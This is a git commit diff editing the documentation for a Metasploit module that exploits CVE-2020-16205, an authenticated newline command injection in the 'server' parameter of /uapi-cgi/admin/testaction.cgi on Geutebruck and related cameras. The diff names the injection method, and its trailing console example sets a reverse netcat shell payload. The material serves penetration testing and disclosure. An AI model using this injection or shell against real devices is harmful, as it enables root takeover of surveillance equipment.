Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work
This commit is contained in:
parent
3c70f37dbe
commit
dc21773f10
|
@ -1,34 +1,41 @@
|
|||
## Vulnerable Application
|
||||
|
||||
The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5:
|
||||
Encoder and E2 Series Camera models:
|
||||
G-Code:
|
||||
EEC-2xxx
|
||||
G-Cam:
|
||||
EBC-21xx
|
||||
EFD-22xx
|
||||
ETHC-22xx
|
||||
EWPC-22xx
|
||||
The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,
|
||||
firmware version 1.12.13.2 or firmware version 1.12.14.5:
|
||||
* Encoder and E2 Series Camera models:
|
||||
* G-Code:
|
||||
* EEC-2xxx
|
||||
* G-Cam:
|
||||
* EBC-21xx
|
||||
* EFD-22xx
|
||||
* ETHC-22xx
|
||||
* EWPC-22xx
|
||||
|
||||
Many brands use the same firmware:
|
||||
UDP Technology (which is also the supplier of the firmware for the other vendors)
|
||||
Ganz
|
||||
Visualint
|
||||
Cap
|
||||
THRIVE Intelligence
|
||||
Sophus
|
||||
VCA
|
||||
TripCorps
|
||||
Sprinx Technologies
|
||||
Smartec
|
||||
Riva
|
||||
* UDP Technology (which is also the supplier of the firmware for the other vendors)
|
||||
* Ganz
|
||||
* Visualint
|
||||
* Cap
|
||||
* THRIVE Intelligence
|
||||
* Sophus
|
||||
* VCA
|
||||
* TripCorps
|
||||
* Sprinx Technologies
|
||||
* Smartec
|
||||
* Riva
|
||||
|
||||
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
|
||||
This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
|
||||
|
||||
### Description
|
||||
|
||||
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface.
|
||||
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
||||
This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the
|
||||
`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
|
||||
This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
|
||||
inject a new line character, followed by the command they wish to execute, at which point the server will
|
||||
then interpret the new string as a separate command to be executed. Successful exploitation will result in
|
||||
remote code execution as the `root` user.
|
||||
|
||||
Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
@ -58,7 +65,6 @@ The password of the username used to authenticate on the admin page. **Default:
|
|||
|
||||
```
|
||||
msf5 > use exploit/linux/http/geutebruck_testaction_exec
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) >
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
|
||||
payload => cmd/unix/reverse_netcat_gaping
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
|
||||
|
|
Loading…
Reference in New Issue